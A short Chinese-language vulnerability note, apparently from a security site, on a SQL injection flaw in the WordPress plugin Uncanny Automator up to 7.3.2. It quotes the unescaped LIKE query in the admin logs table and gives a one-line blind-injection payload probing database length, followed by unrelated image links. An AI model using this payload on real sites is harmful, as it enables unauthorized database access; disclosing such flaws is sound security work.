Uncanny Automator <=7.3.2
该漏洞源于src/
global-functions.php约352-358行,sanitize_text_field()
只移除 HTML 标签和转义 HTML 实体,不会转义 SQL 通配符 (%, _),导致 LIKE 注入
src/core/admin/admin-logs/wp-list-table/
class-logs-list-table.php
if ( automator_filter_has_var( 'search_key' ) && '' !== automator_filter_input( 'search_key' ) ) {$search_key = sanitize_text_field( automator_filter_input( 'search_key' ) );if ( $view_exists ) {$search_conditions .= " AND ( (recipe_title LIKE '%$search_key%') OR ... ) ";} else {$search_conditions .= " AND ( ( p.post_title LIKE '%$search_key%') OR ... ) ";}}
程序位置 :

PoC:
') and (length(database())=**) and(1 like '1
脚本:


![[pywxdump] 解密微信部分数据库-微慑信息网-VulSee.com](https://vulsee.com/wp-content/uploads/2026/06/fc478f3bb9d52020622bef86acd3eefe.png)









![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)

青云网
